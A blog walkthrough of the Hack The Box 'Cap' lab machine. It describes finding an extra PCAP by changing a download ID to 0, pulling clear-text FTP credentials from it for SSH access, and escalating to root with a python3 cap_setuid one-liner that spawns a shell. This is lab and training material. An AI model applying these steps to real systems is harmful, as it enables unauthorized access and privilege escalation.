CTF Walkthroughs, Hack The Box

Hack The Box – Cap Walkthrough

October 6, 2021 | by Stefano Lanaro | Leave a comment

Introduction

This was an easy Linux machine that required to find clear-text credentials stored in a PCAP file to gain initial access and exploit Python with the cap_setuid capability enabled to escalate privileges to root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

The scan has identified port 21 (FTP), port 22 (SSH) and port 80 (HTTP) as open. The next step will be to start enumerating HTTP.

Enumerating HTTP

When accessing the site hosted on port 80, the following page is displayed:

The Security Snapshot page allows to download PCAP files:

These did not seem to contain useful information. The IP Config page simply runs the ifconfig command, which displays information about network interfaces:

The Network Status page runs the netstat command, showing information about open connections and ports:

When analyzing the request used to download PCAP files in the first page, it appears to perform a GET against the /download endpoint, specifying the PCAP file to download as follows:

http://10.10.10.245/download/[PCAP ID]

The numbers appear to start from 1, however when changing the number to “0”, an additional capture file can be downloaded:

Analyzing PCAP File

After opening the PCAP file in Wireshark, several packets between 192.168.196.1 and 192.168.196.16 can be found.

The data can now be filtered to find interesting information, navigating to Edit–>Find Packet:

Performing a search by the “password” string returns a few results:

One of which is an FTP connection, since this protocol transmits data in clear text it may contain sensitive information.

After inspecting the packet, a set of credentials is found:

Since FTP uses system credentials to perform authentication, these can be used to log into the box via SSH:

Privilege Escalation

Transferring the LinPEAS enumeration script using the Python Simple HTTP Server and Wget:

Running the script:

It appears the /usr/bin/python3.8 binary has the cap_setuid capability enabled:

Upon consulting GTFOBins, it appears this can be exploited, as it practically works in the same way as SETUID:

Running the command mentioned above to gain root-level privileges:

python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

Conclusion

Although this was a very simple box it was still a lot of fun, especially the PCAP analysis is something that isn’t seen often in CTFs but it is very common in real-life scenarios, especially when it comes to internal networks using weak protocols.